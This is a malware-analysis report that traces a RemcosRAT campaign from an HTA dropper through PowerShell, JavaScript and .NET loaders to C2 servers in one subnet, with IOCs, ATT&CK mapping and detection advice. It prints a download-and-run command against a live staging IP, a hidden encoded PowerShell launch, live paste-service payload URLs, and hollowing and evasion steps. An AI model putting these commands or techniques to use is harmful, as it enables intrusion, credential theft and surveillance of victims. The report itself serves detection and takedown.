RemcosRAT "SkyLNK" Campaign: Five C2 Listeners, One Subnet, and an Operator Who Left the Directory Listing On
TL;DR: A RemcosRAT 7.2.0 Pro campaign -- tagged "SkyLNK" in the malware config -- was discovered through an HTA dropper (goodwill.hta) uploaded to MalwareBazaar on March 10, 2026. What looked like a single-sample Remcos deployment turned into a full infrastructure cluster: 7 C2 servers across 8 IPs packed into a single ColoCrossing/HostPapa /24 subnet in Buffalo, New York, with 5 concurrent Remcos listeners on one host sharing identical TLS certificates. The staging server at 96.44.159.218 is running a default XAMPP installation with open directory listings that exposed a second, previously unreported HTA campaign. The operator uses paste services for payload hosting, a reused .NET process hollowing loader that has been public since late February, and DuckDNS for C2 resolution. A Portuguese-language comment buried in the JavaScript stage -- // janela oculta ("hidden window") -- points to a Brazilian or Portuguese-speaking operator running what appears to be a credential theft and surveillance operation. Every staging URL was still live at the time of analysis.
One HTA, Seven C2 Servers
This investigation began with a routine MalwareBazaar submission: an HTA file called goodwill.hta, uploaded by researcher pr0xylife on March 10, 2026, from a Danish origin. HTA droppers are a well-worn initial access technique -- they execute as trusted HTML applications in mshta.exe, bypassing most file-type restrictions. Remcos is a well-worn RAT. Neither fact alone warrants a deep investigation.
But pulling the first thread -- the staging URL embedded in the HTA's decoded PowerShell -- led to an exposed XAMPP server with directory listings enabled, which led to a second unreported campaign, which led to a paste service infrastructure chain, which led to seven C2 servers crammed into a single /24 subnet. The operator built a small empire in one network block and then left the front door open.
The question this report answers is not "what does RemcosRAT do" -- that is thoroughly documented. The question is: how much infrastructure can you map from a single HTA file when the operator makes enough mistakes?
The answer, in this case, is all of it.
The Attack Chain: Five Stages, Four Languages
The kill chain moves through five distinct stages, each using a different scripting or runtime environment. This is not sophistication for its own sake -- it is defense evasion through diversity. Each transition between languages forces defenders to switch analysis tools, and each stage introduces its own obfuscation layer.
[Email/Web Delivery]
|
v
goodwill.hta (VBScript + Base64)
|
v
cmd.exe /C powershell -ec [UTF-16LE encoded command]
|
v
WGET http://96.44.159.218/220/seethebesttimeforeverythingtolearn.js
--> Saved to %APPDATA%\ethebesttimeforeverythingtoleae.js
|
v
Win32_Process.Create() --> powershell [deobfuscated]
|
v
Downloads .NET PE from pastefy.app / pastes.io
Downloads encrypted Remcos payload from pastes.io
|
v
Reflective .NET assembly load (DomainLoader)
Process hollowing into Msbuild.exe (x86)
|
v
RemcosRAT 7.2.0 Pro ("SkyLNK" botnet)
C2: goodpeopleswhitbrigheartwinthisindustryi.duckdns.org:14646
Five stages. VBScript to PowerShell to JavaScript to PowerShell to .NET to native Remcos. Each transition is a potential detection opportunity -- and each one is a place where lazy analysis might stop.
Stage 1: The HTA Dropper
The HTA file is 46KB, which is large for what is essentially a launcher. Most of that size comes from obfuscation padding.
| Attribute | Value |
|---|---|
| SHA-256 | ed925501e749cdc073143ed948ec8a93c6b6a4b76304d9c6a76c6faabc8d048e |
| MD5 | faeeeb063ff4d8bbfff9a1fae1b71ca8 |
| SHA-1 | 7c66dcd951d4795fc8aae773f55aec385cfd1c7e |
| Size | 46,681 bytes |
| Type | HTML Application (HTA) |
| Reporter | pr0xylife |
| First Seen | 2026-03-10 10:06:29 UTC |
| Origin | DK (Denmark) |
The obfuscation is multi-layered but not particularly novel. It relies on six techniques working together to defeat static analysis:
- Massive whitespace padding -- 200+ spaces inserted between VBScript tokens, bloating the file and breaking signature-based detection that relies on byte-level patterns
- Random-case keywords --
fUncTION,cReATEoBJect,bAsE64-- defeating case-sensitive string matching - Long random variable names -- 200+ character identifiers that make manual analysis tedious
- Base64-encoded COM object names --
WSCRipt.SHelland%comsPec%are decoded at runtime throughMSXML2.DOMDocument.3.0 - UTF-16LE encoded PowerShell -- the
-ec(EncodedCommand) flag takes a base64 string that decodes to UTF-16LE, adding another encoding layer - IE8 compatibility directive --
X-UA-Compatible: IE=EmulateIE8forces legacy rendering, potentially affecting how some security tools parse the document
When you strip away the obfuscation, the execution flow is straightforward:
1. Create MSXML2.DOMDocument.3.0 (base64 decoder)
2. Create WScript.Shell via decoded base64
3. Expand %comspec% --> cmd.exe
4. Execute: cmd.exe /C powershell -EX bypass -noP -W 1 -ec [base64]
5. Download seethebesttimeforeverythingtolearn.js from staging server
6. Save to %APPDATA%\ethebesttimeforeverythingtoleae.js
7. Execute the JS file
Note the typo in the saved filename: ethebesttimeforeverythingtoleae.js is missing the letters "rn" compared to the source URL. This is a minor artifact, but it is the kind of detail that becomes a reliable behavioral indicator -- hunt for this exact misspelled filename across your endpoint telemetry.
Stage 2: The JavaScript Loader and a Portuguese Comment
The downloaded JavaScript file is where the investigation gets interesting from an attribution perspective.
| Attribute | Value |
|---|---|
| SHA-256 | 1b9791c5c75b7eb0c7510c42c6381f4fbfc40539c3afaab192d0ee65ab591d28 |
| Size | 33,794 bytes |
| Type | JScript (Windows Script Host) |
The obfuscation here is string-based rather than encoding-based. The entire payload is built through 600+ concatenation operations, with the junk delimiter FSfdbFokAmoohj inserted throughout the assembled string. At execution time, the script calls .split("FSfdbFokAmoohj").join("") to strip the delimiter and produce clean code. Dead code -- unused variables, meaningless arithmetic operations -- is scattered throughout as additional noise.
But buried in this obfuscated JavaScript, probably left in by accident, is a single comment in Portuguese:
// janela oculta
"Hidden window." A description of what the next line does -- launch a process with ShowWindow = 0 via WMI's Win32_Process.Create(). This is the kind of artifact that survives because developers comment their code during development and forget to strip comments before deployment. It is a small thing, but it narrows the operator's likely origin to the Lusophone world, and combined with other indicators -- the grammatically awkward English in the DuckDNS domain, the filename typos -- Brazilian Portuguese is the most likely first language.
The JavaScript stage uses WMI to launch PowerShell with yet another base64-encoded UTF-16LE payload, this time with a hidden window flag to prevent any visible console from appearing to the user.
Stage 3: PowerShell and Paste Service Abuse
The decoded PowerShell from Stage 2 is where the actual payload retrieval happens. The script performs these actions in sequence:
Start-Sleep -Seconds 3-- a brief sandbox evasion delay- Forces TLS 1.2 via
[Net.ServicePointManager]::SecurityProtocol = Tls12 - Defines a C# class called
DomainLoaderfor reflective assembly loading (compiled at runtime viaAdd-Type) - Downloads a .NET PE from paste services with failover logic (primary: yaso.su, fallback: pastefy.app)
- Downloads an encrypted Remcos payload from pastes.io
- Extracts base64 content between
<<BASE64_START>>and<<BASE64_END>>markers - Reflectively loads the .NET assembly and calls
myprogram.Homees.runss() - Passes parameters:
($gg, '0', '', 'Msbuild', '0', 'x86')-- specifying the process hollowing target
The paste service infrastructure is worth examining in detail because it reveals the operator's hosting strategy:
| Service | URL | Content | Status |
|---|---|---|---|
| yaso[.]su | /raw/UpxC8OJX | .NET loader PE (base64 with markers) | DEAD (403) |
| pastefy[.]app | /sLC7Jpkp/raw | .NET loader PE (base64 with markers) | LIVE |
| pastes[.]io | /raw/lE4qJRgR | Encrypted Remcos payload (706KB) | LIVE |
The failover from yaso.su to pastefy.app is significant. It means the operator has already had at least one paste service takedown during this campaign and built redundancy into the download chain. The encrypted Remcos payload on pastes.io is 706KB -- large enough that it would stand out in paste service abuse monitoring, but paste services generally do not inspect content for malware.
This is a pattern worth watching: paste services as malware CDNs. They offer free hosting, no registration verification, raw content endpoints that return clean binary data, and HTTPS encryption that prevents network-layer inspection. For an operator, the only downside is the audit trail -- and this particular operator does not seem to care much about audit trails.
Stage 4: The .NET Process Hollower
The .NET loader has been public for two weeks. It was first submitted to MalwareBazaar on February 26, 2026, by researcher James_inthe_box, and has been analyzed in CAPE Sandbox.
| Attribute | Value |
|---|---|
| SHA-256 | bd6b60ce34d8fa3f2b9d032b49aac5b47f868b09ab24ccbd9c7168e5bfc8e963 |
| MD5 | 13743b70ab1afec1d36b6b3d929cd44c |
| Size | 50,688 bytes |
| Type | PE32+ executable (GUI) x86-64 Mono/.NET assembly |
| Framework | .NET Framework 4.8 |
| First Seen | 2026-02-26 13:54:40 UTC |
| CAPE Analysis | https://www.capesandbox.com/analysis/54704/ |
The loader performs textbook process hollowing using the standard Windows API sequence:
CreateProcess (suspended) --> VirtualAlloc --> WriteProcessMemory
--> SetThreadContext --> ResumeThread
What is notable is the completeness of the implementation. The extracted API strings show support for both 32-bit and 64-bit injection:
VirtualAlloc32/64,CreateProc32/64,ResumeThread32/64WriteMem32/64,ReadMem32,UnmapView32/64GetCtx32/64,SetCtx32/64,GetCtxWow32VirtualProtect64,CloseHandle64LoadLibraryA,GetProc(dynamic API resolution)
The hollowing target is Msbuild.exe -- Microsoft Build Engine -- running in x86 mode. Like Aspnet_compiler.exe and RegAsm.exe (common choices in other campaigns), Msbuild is a legitimate Microsoft binary that lives in the .NET Framework directory. It is a well-known LOLBin: a signed Microsoft executable that security products are reluctant to flag, making it an ideal host for injected malware.
The loader also includes registry persistence capabilities targeting CurrentUser keys, ensuring the RAT survives reboots.
Stage 5: RemcosRAT 7.2.0 Pro -- The SkyLNK Botnet
The final payload is RemcosRAT version 7.2.0 Pro -- the commercial, licensed variant sold by Breaking Security (a company that markets Remcos as a "remote administration tool" while it is overwhelmingly used for cybercrime). The Triage sandbox run extracted the full configuration:
| Setting | Value |
|---|---|
| Version | 7.2.0 Pro |
| Botnet ID | SkyLNK |
| C2 Server | goodpeopleswhitbrigheartwinthisindustryi[.]duckdns[.]org:14646 |
| Mutex | Rmc-E3G25N |
| Copy File | remcos.exe |
| Copy Folder | Remcos |
| Connect Delay | 0 seconds |
| Connect Interval | 1 second |
| Keylog File | logs.dat |
| Keylog Folder | remcos |
| Screenshot Folder | Screenshots |
| Screenshot Path | %AppData% |
| Screenshot Interval | 10 seconds |
| Audio Record Folder | MicRecords |
| Audio Record Duration | 5 seconds |
The configuration tells a story about the operator's intentions. A 10-second screenshot interval is aggressive surveillance -- that is 360 screenshots per hour, generating significant data volume. Combined with 5-second audio recording clips and continuous keylogging, this is not a smash-and-grab credential stealer. This is persistent surveillance infrastructure designed to capture everything a victim does on their machine.
The connect interval of 1 second with zero delay means the RAT begins beaconing immediately after injection. There is no attempt to blend into normal traffic patterns or use jitter -- the operator prioritizes reliability over stealth at the C2 communication layer.
The Triage sandbox captured the full process execution tree, which maps every stage of the kill chain to observable process relationships:
mshta.exe (5104)
--> cmd.exe (816)
--> powershell.exe (4736) [SeDebugPrivilege]
--> WScript.exe (2440) [JS execution]
--> csc.exe (4140) [DomainLoader compilation]
--> cvtres.exe (2424)
--> Msbuild.exe (3920) [Process hollowed with Remcos]
--> userinit.exe (2460) [Nirsoft credential harvester]
--> userinit.exe (4752) [Nirsoft credential harvester]
--> userinit.exe (4416) [Nirsoft credential harvester]
Note the csc.exe invocation: the PowerShell stage compiles the DomainLoader C# class at runtime using the .NET compiler service, which spawns cvtres.exe (the resource-to-object converter). This is a detectable artifact -- csc.exe spawned as a child of powershell.exe is abnormal in most enterprise environments and should be monitored.
The three userinit.exe child processes of the hollowed Msbuild.exe are Nirsoft credential harvesting tools, deployed by Remcos to extract passwords from browsers, email clients, and other applications. This is standard Remcos behavior -- it ships with embedded Nirsoft utilities and spawns them as needed for credential collection.
C2 communication runs over TLS on port 14646, with the sandbox recording 509,865 bytes received and 12,827 bytes sent across 203 packets -- a ratio that reflects the operator sending commands and configuration updates while the RAT exfiltrates data.
Infrastructure Analysis: A Whole Subnet
This is where the investigation goes from "another Remcos campaign" to "an operator running a small botnet farm out of a single network block."
Starting from the C2 domain resolved by the Remcos configuration, we mapped the entire 96.44.159.0/24 subnet and found seven C2 servers, a staging server, and an XWorm deployment that may belong to the same actor.
The Network Map
| IP | Ports | Services | Role | Status |
|---|---|---|---|---|
| 96.44.159.218 | 80, 135, 443, 445, 3389 | Apache/XAMPP Win64, RDP | Staging / Payload Delivery | LIVE |
| 96.44.159.137 | 135, 445, 3389, 14641-14647 | Windows, Remcos C2 x5 | Primary C2 Server | LIVE |
| 96.44.159.225 | 445, 3389 | Windows, Remcos C2 | Secondary C2 | LIVE |
| 96.44.159.222 | 445, 5357 | Windows, Remcos C2 | Secondary C2 | LIVE |
| 96.44.159.151 | 445 | Windows, Remcos C2 | Secondary C2 | LIVE |
| 96.44.159.165 | -- | Remcos C2 | Secondary C2 | LIVE |
| 96.44.159.154 | -- | Remcos (port 1212) | Older C2 (January) | UNKNOWN |
| 96.44.159.208 | -- | XWorm (port 4242) | XWorm C2 | UNKNOWN |
All eight IPs are in the same /24 block, all hosted by HostPapa (operating on ColoCrossing infrastructure) in Buffalo, New York. Every server that exposes SMB (port 445) or RDP (port 3389) is running Windows. This is a single operator renting a block of Windows VPS instances from the same provider and deploying RAT C2 servers across them.
The primary C2 host at 96.44.159.137 is running five concurrent Remcos listeners on ports 14641, 14642, 14645, 14646, and 14647. Five listeners on one box means five separate campaigns or victim groups being managed through one server. The SkyLNK campaign we are tracking uses port 14646 -- but four other botnets are running alongside it.
TLS Certificate Clustering
TLS certificate analysis reveals the organizational structure of these C2 servers. All five listeners on .137 share a single certificate:
| Certificate Serial | Hosts | Interpretation |
|---|---|---|
620F885FCCD540A59B778B08716661D1 | .137 (ports 14641-14647) | Single Remcos instance, 5 listeners |
4B615D8D3F62857406372B7BB0C96304 | .225, .151 | Shared instance or cloned config |
4DCC27375E5A83560A4E18FBEBBE055C | .222 | Independent instance |
6024F0D0D15B0FBF41D66C1235FD9A29 | .165 | Independent instance |
All certificates share the same characteristics: ECDSA P-256, validity from 1970-01-01 to 2090-12-31, empty subject and issuer fields. This is the Remcos default TLS configuration -- the operator did not bother to customize certificates. That default certificate profile is itself a fingerprinting opportunity: any TLS server presenting an ECDSA P-256 certificate with epoch-start validity and blank subject fields on a high-numbered port is almost certainly Remcos.
The shared certificate between .225 and .151 suggests either a cloned Remcos installation (the operator imaged one VM and deployed it to a second IP) or a single Remcos instance listening on two interfaces. Either way, these two hosts are operationally linked.
The Staging Server: XAMPP With the Door Open
The staging server at 96.44.159.218 is the crown jewel of this operator's OPSEC failures.
It is running XAMPP 8.1.25 (Apache 2.4.58, OpenSSL 3.1.3, PHP 8.1.25) on Windows with the default dashboard still accessible at the root URL. phpMyAdmin is present but returns 403. The HTTPS certificate is the default XAMPP self-signed cert with CN=localhost, expired in 2019. This is a stock XAMPP installation with minimal hardening.
More critically, the operator organized campaigns into numbered directories -- /220/ and /221/ -- but failed to disable directory listings on /221/. The result:
Directory listing of /221/ (LIVE as of 2026-03-10 12:25 UTC):
nicewalkingwithbestthings.js 33K 2026-03-10 00:55
ss/stlegoodfornewhingsforme.hta 46K 2026-03-10 00:56
This exposed a second, previously unreported HTA campaign (stlegoodfornewhingsforme.hta, SHA256: 77981d8f...) and its companion JavaScript loader. The /220/ directory -- serving the SkyLNK campaign we initially investigated -- does not have directory listing enabled, but its payloads are directly accessible by URL. The operator remembered to lock one door but not the other.
The timestamps are telling: both /221/ payloads were uploaded at 00:55-00:56 UTC on March 10, just hours before the /220/ campaign's HTA was distributed. The operator was actively building and staging parallel campaigns overnight.
What Was Found vs. What Was Known
Prior to this investigation, the public record for this campaign consisted of a single MalwareBazaar sample and a couple of ThreatFox IOC entries. Here is what our analysis added:
| Aspect | Prior Reporting | Our Findings |
|---|---|---|
| C2 Infrastructure | 1 domain, 1 port (ThreatFox) | 5 active listeners on primary C2, 7 C2 servers across subnet |
| Staging Infrastructure | 1 URL (DocGuard) | 2 campaign directories, open directory listing, exposed XAMPP |
| Campaign Scope | 1 HTA sample | 2 HTA campaigns running simultaneously from same server |
| Loader Reuse | Known since Feb 26 | Confirmed same loader across both campaigns |
| Attribution | Unknown | Portuguese-speaking operator, likely Brazilian |
| Malware Families | Remcos only | Remcos + XWorm C2 in same subnet |
| TLS Fingerprints | None | 4 distinct certificate serials mapped across 6 C2 hosts |
| Paste Infrastructure | None | 3 paste services identified (1 dead, 2 live) |
The jump from "1 domain, 1 port" to "7 C2 servers, 5 listeners, 2 campaigns, 3 paste services" illustrates why infrastructure pivoting matters. Every IOC is a node in a graph. The question is always whether you stop at the first node or follow the edges.
Threat Actor Profile: Portuguese-Speaking, Medium Sophistication, Bad OPSEC
Attribution Assessment
- Confidence: MEDIUM
- Language: Portuguese (Brazilian Portuguese likely)
- Motivation: Financial -- credential theft, surveillance-as-a-service
The evidence for Portuguese-language attribution rests on multiple converging indicators:
- The
// janela ocultacomment in the JavaScript payload -- this is Portuguese for "hidden window" and is almost certainly a development artifact that was not stripped before deployment - The DuckDNS domain (
goodpeopleswhitbrigheartwinthisindustryi) -- the long, grammatically awkward English phrasing is consistent with English as a second language, and the aspirational tone ("good peoples with bright heart win this industry") matches social engineering language commonly observed in Brazilian cybercrime operations - The filename typo (
ethebesttimeforeverythingtoleae.js) -- systematic letter-dropping in English words is a common error pattern for Portuguese speakers
None of these individually would be sufficient for attribution. Taken together, they paint a consistent picture.
OPSEC Failures
This operator makes mistakes that more disciplined threat actors would not:
- Open directory listing on
/221/exposing a parallel campaign's artifacts to anyone who browses the staging server - Default XAMPP dashboard accessible at the staging server root, advertising the exact software stack
- Reused .NET loader across campaigns -- the same hash has been public since February 26, giving defenders two weeks of lead time
- All C2 servers in one /24 subnet -- a single abuse report to HostPapa could take down the entire operation
- Concurrent campaigns on the same staging server -- cross-campaign linkage is trivial
- Portuguese comment in production code -- a development artifact that narrows attribution
- Identical TLS certificates across all 5 listeners on the primary C2 -- trivial fingerprinting
- Paste services for payload hosting -- auditable, reportable, and subject to takedown
The sophistication-to-OPSEC ratio is telling. The operator has technical skill: multi-stage delivery chains, process hollowing, reflective assembly loading, paste service failover, multiple C2 servers. But the operational discipline is absent. This profile is consistent with a mid-tier cybercriminal who purchased Remcos Pro and has enough development skill to build custom delivery chains but has not internalized the practices that would make them harder to track.
Actor Timeline
The timeline reveals an operator who has been active in this subnet since at least late 2025:
| Date | Event |
|---|---|
| 2025-11-11 | XWorm C2 active at 96.44.159.208:4242 (possibly same actor) |
| 2026-01-02 | Remcos C2 deployed at 96.44.159.154:1212 |
| 2026-02-26 | .NET process hollowing loader first submitted to MalwareBazaar |
| 2026-03-04 | Remcos C2 at 96.44.159.137:14645 reported by DonPasci |
| 2026-03-05 | Remcos C2s at .225:14645, .222:14645, .151:14645 reported |
| 2026-03-07 | Remcos C2 at .165:14645 reported |
| 2026-03-10 00:55 | Campaign 2 payloads uploaded to staging server (/221/) |
| 2026-03-10 ~10:00 | Campaign 1 HTA (goodwill.hta) distributed |
| 2026-03-10 10:06 | goodwill.hta submitted to MalwareBazaar by pr0xylife |
The XWorm C2 from November 2025 is an open question. Same subnet, same provider, same hosting profile -- but XWorm is a different malware family with different tooling. It could be the same actor running multiple RATs (common in the Brazilian cybercrime ecosystem), a shared hosting environment with co-tenants, or coincidence. We assess with LOW confidence that it is the same operator.
The March timeline shows rapid expansion: four new C2 IPs in three days (March 4-7), followed by campaign deployment on March 10. The operator is scaling up.
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Implementation |
|---|---|---|---|
| Initial Access | Spearphishing Attachment | T1566.001 | HTA file delivery (goodwill.hta) |
| Execution | VBScript | T1059.005 | HTA VBScript execution in mshta.exe |
| Execution | PowerShell | T1059.001 | Multi-stage PowerShell loaders with -ec flag |
| Execution | JavaScript | T1059.007 | JScript Stage 2 via WScript.exe |
| Execution | Malicious File | T1204.002 | HTA requires user execution |
| Execution | Windows Management Instrumentation | T1047 | Win32_Process.Create() hidden window launch |
| Persistence | Registry Run Keys | T1547.001 | CurrentUser registry persistence |
| Defense Evasion | Obfuscated Files or Information | T1027 | Whitespace padding, random case, base64, delimiter-based concatenation |
| Defense Evasion | Process Hollowing | T1055.012 | Injection into Msbuild.exe (x86) |
| Defense Evasion | Deobfuscate/Decode Files | T1140 | Base64, UTF-16LE, delimiter stripping |
| Defense Evasion | Masquerading | T1036 | Abuse of Msbuild.exe as LOLBin host |
| Defense Evasion | Virtualization/Sandbox Evasion | T1497 | 3-second sleep timer |
| Credential Access | Credentials from Password Stores | T1555 | Outlook credential theft via Nirsoft tools |
| Credential Access | Keylogging | T1056.001 | Continuous keylogging to logs.dat |
| Collection | Screen Capture | T1113 | Screenshots every 10 seconds |
| Collection | Audio Capture | T1123 | 5-second audio recording clips |
| Collection | Email Collection | T1114 | Outlook account access |
| Command and Control | Application Layer Protocol | T1071 | TLS-encrypted C2 on port 14646 |
| Command and Control | Dynamic Resolution | T1568.002 | DuckDNS for C2 domain resolution |
| Command and Control | Ingress Tool Transfer | T1105 | Multi-stage payload download chain |
| Command and Control | Web Service | T1102 | Paste services (pastefy.app, pastes.io) for payload hosting |
Indicators of Compromise
File Indicators
# Stage 1: HTA Dropper (goodwill.hta)
SHA256: ed925501e749cdc073143ed948ec8a93c6b6a4b76304d9c6a76c6faabc8d048e
SHA1: 7c66dcd951d4795fc8aae773f55aec385cfd1c7e
MD5: faeeeb063ff4d8bbfff9a1fae1b71ca8
# Stage 2: JavaScript Loader
SHA256: 1b9791c5c75b7eb0c7510c42c6381f4fbfc40539c3afaab192d0ee65ab591d28
# Stage 4: .NET Process Hollowing Loader (myprogram.exe)
SHA256: bd6b60ce34d8fa3f2b9d032b49aac5b47f868b09ab24ccbd9c7168e5bfc8e963
MD5: 13743b70ab1afec1d36b6b3d929cd44c
# Encrypted Remcos Payload
SHA256: 86e8ea352b0b478268775c078313b244183cc7a81ecfc8112738966a6c202fba
MD5: 82327ad776a2738130b59fbd05dbae98
# Campaign 2 HTA (unreported -- discovered via open directory)
SHA256: 77981d8f5314d1cb495a69075849eefed611edd29029492217f52cd04e982262
# Campaign 2 JavaScript Loader
SHA256: be085e98c07119287362328aa5b9ffe3f1b2b3607edf353d3e81333aff186af1
Network Indicators
# C2 Domain (defanged)
goodpeopleswhitbrigheartwinthisindustryi[.]duckdns[.]org (port 14646)
# C2 IPs (defanged)
96[.]44[.]159[.]137 (primary C2 -- ports 14641, 14642, 14645, 14646, 14647)
96[.]44[.]159[.]225 (secondary C2 -- port 14645-14646)
96[.]44[.]159[.]222 (secondary C2 -- port 14645-14646)
96[.]44[.]159[.]151 (secondary C2 -- port 14645)
96[.]44[.]159[.]165 (secondary C2 -- port 14645-14646)
96[.]44[.]159[.]154 (older C2 -- port 1212)
# Staging Server (defanged)
96[.]44[.]159[.]218 (XAMPP payload delivery)
# Staging URLs (defanged)
hxxp://96[.]44[.]159[.]218/220/seethebesttimeforeverythingtolearn[.]js
hxxp://96[.]44[.]159[.]218/221/nicewalkingwithbestthings[.]js
hxxp://96[.]44[.]159[.]218/221/ss/stlegoodfornewhingsforme[.]hta
# Paste Service URLs (defanged)
hxxps://pastefy[.]app/sLC7Jpkp/raw
hxxps://yaso[.]su/raw/UpxC8OJX
hxxps://pastes[.]io/raw/lE4qJRgR
TLS Certificate Indicators
| Serial Number | Hosts |
|---|---|
620F885FCCD540A59B778B08716661D1 | 96.44.159.137 (ports 14641-14647) |
4B615D8D3F62857406372B7BB0C96304 | 96.44.159.225, 96.44.159.151 |
4DCC27375E5A83560A4E18FBEBBE055C | 96.44.159.222 |
6024F0D0D15B0FBF41D66C1235FD9A29 | 96.44.159.165 |
All certificates: ECDSA P-256, validity 1970-01-01 to 2090-12-31, empty subject/issuer (Remcos default).
Behavioral Indicators
# Mutex
Rmc-E3G25N
# Registry access
HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
# File system artifacts
%APPDATA%\remcos\logs.dat (keylogger output)
%APPDATA%\Screenshots\ (screenshot captures)
%APPDATA%\MicRecords\ (audio recordings)
%APPDATA%\ethebesttimeforeverythingtoleae.js (Stage 2 drop -- note typo)
remcos.exe copied to Remcos\ (persistence copy)
# Process relationships (detection signatures)
mshta.exe --> cmd.exe --> powershell.exe --> WScript.exe
powershell.exe --> csc.exe --> cvtres.exe (runtime C# compilation)
Msbuild.exe --> userinit.exe (Nirsoft credential harvesting)
# Process hollowing target
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe (x86)
Detection Recommendations
Immediate (24-48 hours)
- Block all IOCs listed above at the network perimeter -- IPs, domains, and paste service URLs
- Hunt for the mutex
Rmc-E3G25Nacross endpoint telemetry - Search for the keylogger file
logs.datunder%APPDATA%\remcos\ - Check proxy and DNS logs for connections to the 96.44.159.0/24 subnet
- Block DuckDNS resolution at the DNS resolver level if it is not required for business operations
- Report the live paste URLs to pastefy.app and pastes.io abuse teams
Short-term (1-2 weeks)
- Deploy YARA rules targeting the HTA obfuscation pattern (200+ character whitespace padding between VBScript tokens) and the .NET loader hash
- Monitor the 96.44.159.0/24 subnet for new C2 deployments -- this operator is actively expanding
- Hunt for
Msbuild.exespawninguserinit.exeas a process hollowing indicator - Alert on
csc.exespawned as a child ofpowershell.exe-- this indicates runtime .NET compilation, which is abnormal in most environments - Check email gateways for HTA attachments, particularly those exceeding 40KB
Medium-term (1-3 months)
- Develop a Suricata rule for the Remcos default TLS fingerprint: ECDSA P-256 certificate with epoch-start validity (1970-01-01), far-future expiry (2090-12-31), and blank subject/issuer fields on high-numbered ports
- Monitor DuckDNS for new domains resolving to the 96.44.159.0/24 range
- Track the .NET loader hash (
bd6b60ce...) across MalwareBazaar for campaign evolution -- this loader is being reused and will appear in future campaigns - Coordinate with HostPapa abuse (net-abuse-global@hostpapa.com) for infrastructure takedown -- all 8 IPs are with the same provider
References
- MalwareBazaar: https://bazaar.abuse.ch/sample/ed925501e749cdc073143ed948ec8a93c6b6a4b76304d9c6a76c6faabc8d048e/
- Triage Sandbox: https://tria.ge/reports/260310-l5rnlafx8x/
- CAPE Sandbox (.NET loader): https://www.capesandbox.com/analysis/54704/
- ThreatFox IOC: https://threatfox.abuse.ch/ioc/1762760/
- ThreatFox IOC (prior): https://threatfox.abuse.ch/ioc/1758481/
- Malpedia Remcos: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Published by Breakglass Intelligence. Investigation conducted 2026-03-10. 1 HTA file. 5 attack stages. 7 C2 servers. 2 campaigns. 8 OPSEC failures. 1 Portuguese comment that gave you away. Classification: TLP:CLEAR